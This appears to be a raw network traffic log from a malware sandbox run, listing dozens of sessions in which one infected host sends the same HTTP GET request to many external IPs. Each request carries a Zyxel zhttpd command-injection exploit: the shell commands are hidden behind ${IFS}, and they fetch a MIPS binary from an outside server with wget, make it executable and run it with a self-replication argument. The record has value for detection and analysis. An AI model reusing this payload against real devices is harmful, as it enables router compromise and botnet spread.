                                      Jan 14, 2024 15:50:52.433480978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5781192.168.2.1444362122.204.227.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433504105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5782192.168.2.1455328107.15.63.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433552980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5783192.168.2.1442910145.53.189.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433584929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5784192.168.2.1438466191.18.96.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433629036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5785192.168.2.14439241.202.10.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433695078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5786192.168.2.144946672.201.95.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433726072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5787192.168.2.1441752184.75.60.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433757067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5788192.168.2.144786663.211.178.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433805943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5789192.168.2.1442186138.211.201.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433841944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5790192.168.2.144912866.76.148.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433898926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5791192.168.2.1458390219.254.62.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433933973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5792192.168.2.1438694192.189.110.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.433985949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5793192.168.2.1432868169.34.236.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434020042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5794192.168.2.143827246.129.41.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434076071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5795192.168.2.1440266192.64.62.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434103012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5796192.168.2.1437850172.145.171.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434124947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5797192.168.2.1450644152.255.197.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434205055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5798192.168.2.1451658107.254.24.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434226036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5799192.168.2.144969851.182.182.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434258938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5800192.168.2.1440858192.232.47.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434307098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5801192.168.2.1449542169.125.211.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434359074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5802192.168.2.1438506166.32.253.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434391022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5803192.168.2.1455600179.132.197.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434428930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5804192.168.2.1444112180.221.181.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434477091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5805192.168.2.1454720134.243.235.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434506893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5806192.168.2.144623674.221.135.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434542894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5807192.168.2.145237253.136.2.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434587955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5808192.168.2.1441460210.191.86.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434643030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5809192.168.2.1449852155.206.51.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434674025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5810192.168.2.143360476.204.21.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434724092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5811192.168.2.1457440207.166.151.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434787989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5812192.168.2.143670044.27.188.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434828043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5813192.168.2.145966245.13.89.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434891939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5814192.168.2.1453190198.5.151.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434931993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5815192.168.2.1437312168.189.211.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.434997082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5816192.168.2.145160243.1.243.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435026884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5817192.168.2.145143891.74.28.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435046911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5818192.168.2.145063448.219.151.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435092926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5819192.168.2.143638048.29.46.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435138941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5820192.168.2.1439360179.79.231.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435180902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5821192.168.2.1445052134.66.48.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435229063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5822192.168.2.1443600219.86.96.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435261965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5823192.168.2.144695474.3.194.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435292006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5824192.168.2.14352422.131.39.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435328007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5825192.168.2.145669093.123.101.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435393095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5826192.168.2.1460172144.232.149.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435448885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5827192.168.2.1444154160.165.252.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435511112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5828192.168.2.1433614172.221.57.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435559988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5829192.168.2.1436004125.215.106.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435589075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5830192.168.2.143939670.167.65.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435651064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5831192.168.2.1445478192.174.33.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435693979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5832192.168.2.143950696.120.69.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435725927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5833192.168.2.144600690.22.232.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435762882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5834192.168.2.1456830190.13.55.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435792923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5835192.168.2.143903873.212.245.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435832024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5836192.168.2.145135686.19.179.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435878992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5837192.168.2.145462872.63.174.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435936928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5838192.168.2.1458378205.160.200.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.435967922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5839192.168.2.144095643.107.154.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436016083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5840192.168.2.1457620190.5.46.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436079979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5841192.168.2.144647019.234.219.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436100006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5842192.168.2.144475284.30.211.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.436130047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5843192.168.2.1433540141.147.152.177443
                                      TimestampBytes transferredDirectionData
